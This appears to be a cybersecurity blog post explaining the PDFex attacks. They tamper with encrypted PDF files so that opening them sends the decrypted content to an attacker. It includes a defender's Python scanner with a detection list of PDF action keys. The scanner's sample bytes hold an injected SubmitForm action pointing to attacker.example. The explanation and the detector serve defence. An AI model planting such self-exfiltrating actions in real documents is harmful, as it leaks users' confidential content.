Well, that's now possible, thanks to a set of attack techniques that could allow attackers to access the entire content of a password-protected or encrypted PDF file.
PDFex, the new set of techniques, includes two classes of attacks that take advantage of a weakness in the standard encryption protection built into the PDF (Portable Document Format). PDFex does not allow an attacker to learn or remove the password of an encrypted PDF file, but it allows an attacker to remotely exfiltrate the content once a legitimate user opens that PDF file.
In other words, a PDFex attack allows attackers to modify a password-protected or encrypted PDF file, without having the corresponding password, in such a way that when it is opened by someone with the correct password, the file automatically sends a copy of the decrypted content to a remote attacker.
PDFex was tested against 27 desktop and web PDF viewers, such as Adobe Acrobat, Foxit Reader, Evince, Nitro Reader, Okular, and the built-in PDF viewers of Chrome, Firefox, Safari, and Opera. All of the tested PDF viewers were found vulnerable.
It is important to note that the attack targets the encryption defined by the PDF (Portable Document Format) standard itself, not the external applications.
PDFex Attacks Exploit Two PDF Vulnerabilities
The two major weaknesses exploited by PDFex attacks are:
1. Partial Encryption
The standard PDF specification by design supports partial encryption, which allows only strings and streams to be encrypted, while the objects defining the PDF file's structure remain unencrypted.
Thus, support for mixing plaintext with ciphertext gives attackers an opportunity to easily manipulate the file structure and inject a malicious payload into it.
2. Ciphertext Malleability
PDF encryption uses the CBC (Cipher Block Chaining) encryption mode with no integrity checks, which attackers can use to create self-exfiltrating ciphertext parts.
PDFex Attack Classes: Direct Exfiltration and CBC Gadgets
Now, let's understand the two classes of PDFex attacks.
Class A : Direct Exfiltration
It takes advantage of the partial encryption feature (meaning the entire PDF file is not encrypted, leaving some parts unencrypted) of a password-protected PDF file.
Thus, an attacker can modify the unencrypted fields, add unencrypted objects, and create a trapped PDF file that, when decrypted and opened, attempts to send the file's content to the attacker.
This can be achieved in three ways:
1. By modifying a PDF file's unencrypted data to add a PDF form that automatically submits the PDF's content to an attacker's server when the victim decrypts and opens the encrypted PDF file.
2. By modifying a PDF file's unencrypted data to add a link that is automatically triggered when the victim decrypts and opens the encrypted PDF file.
3. By modifying a PDF file's unencrypted data to add JavaScript code that automatically runs when the victim decrypts and opens the encrypted PDF file.
Of the three ways, the first is the easiest to perform and the most effective, as it doesn't require user interaction. The second requires opening an external browser, which the user could prevent. The third is the least reliable method because many PDF apps limit JavaScript (JS) support due to the security risks of letting PDF files run JS code in the background.
As shown in the picture, the object containing the link (in blue) for form submission is not encrypted and is completely controlled by the attacker.
Class B : CBC Gadgets
CBC gadgets mean that the ciphertext is modified so that it exfiltrates itself after decryption.
Not all PDF viewers support partially encrypted documents, but many of them also lack file integrity protection, which allows attackers to directly modify the data within an encrypted object.
The attack scenario of CBC gadgets is almost the same as the Direct Exfiltration attacks, the only difference being that here the attacker modifies the existing encrypted content (which is decrypted when the user opens the encrypted PDF file) or creates new content from CBC gadgets to add actions that define how the data is exfiltrated.
Besides this, if a PDF file contains compressed streams to reduce the file size, attackers need to use half-open object streams to steal the data.
An attacker can use a CBC gadget to modify the encrypted content so as to create trapped PDF files that submit their own content to remote servers via PDF forms or URLs.
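A defender-side check that follows from both attack classes above: whichever route is used, the trapped file ends up carrying an action (a form submission, a URI or JavaScript) that the viewer executes on open, and in a file that declares /Encrypt any string literal should be ciphertext rather than readable text. The following Python scanner is added here as an example; it is not code from the original article or from the PDFex researchers. The sample bytes and the attacker.example host are constructed for the example, and the string-readability test is a heuristic, not a proof of tampering.

```python
import re

# Action-related PDF names that, inside an encrypted document, deserve a second
# look: both PDFex classes end up adding one of these to get the content sent out.
SUSPICIOUS_KEYS = (b"/OpenAction", b"/AA", b"/SubmitForm", b"/URI",
                   b"/JavaScript", b"/JS", b"/Launch", b"/GoToR")

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.DOTALL)
STR_RE = re.compile(rb"\((.*?)(?<!\\)\)", re.DOTALL)   # literal strings ( ... )

# Constructed, minimal PDF-like bytes (not a real file): object 1 carries an
# injected, unencrypted SubmitForm action; object 3 holds an encrypted-looking string.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R\n"
    b"   /OpenAction << /S /SubmitForm /F (http://attacker.example/collect) >> >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    b"3 0 obj\n<< /Title (\x8a\x02\xf4\x1d\x9c\x07\x31\xee) >>\nendobj\n"
    b"4 0 obj\n<< /Fields [] >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R /Info 3 0 R /Encrypt 5 0 R >>\n%%EOF\n"
)


def is_encrypted(pdf: bytes) -> bool:
    """True when the file declares an /Encrypt dictionary (standard security handler)."""
    return b"/Encrypt" in pdf


def looks_like_plaintext(s: bytes) -> bool:
    """Encrypted strings are CBC ciphertext and look random; readable ASCII
    inside an encrypted file hints that the string was injected unencrypted."""
    return len(s) > 0 and all(32 <= c < 127 for c in s)


def scan_pdf(pdf: bytes) -> list:
    """Return one finding per object that carries an action key in an encrypted PDF."""
    findings = []
    if not is_encrypted(pdf):
        return findings            # PDFex only concerns encrypted files
    for num, _gen, body in OBJ_RE.findall(pdf):
        keys = [k for k in SUSPICIOUS_KEYS if k in body]
        if not keys:
            continue
        plain = [s for s in STR_RE.findall(body) if looks_like_plaintext(s)]
        findings.append({"obj": int(num), "keys": [k.decode() for k in keys],
                         "plaintext_strings": [s.decode() for s in plain]})
    return findings


if __name__ == "__main__":
    for f in scan_pdf(SAMPLE_PDF):
        print(f"object {f['obj']}: actions {f['keys']}, readable strings {f['plaintext_strings']}")
```

Objects flagged with a readable string are the ones to inspect by hand; a legitimately encrypted document with a harmless /OpenAction will still show up, but its strings should not be readable.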
All 27 of the widely used desktop and web PDF viewers tested were vulnerable to at least one of these attacks.
All of these attacks require the attacker to be in a position to modify encrypted PDF files, for example by intercepting the user's network traffic or by having physical access to a storage system.
PDFex is a major weakness in the PDF standard, and it must be fixed in future PDF specifications.
For more details on the PDFex attacks, you can visit the website released by the researchers and read the research paper titled "Practical Decryption exFiltration: Breaking PDF Encryption."
I hope you find useful information in this article. If you have any questions, please mention them in the comments section and I will get back to you, and stay tuned with my blog to learn interesting things related to cybersecurity and hacking.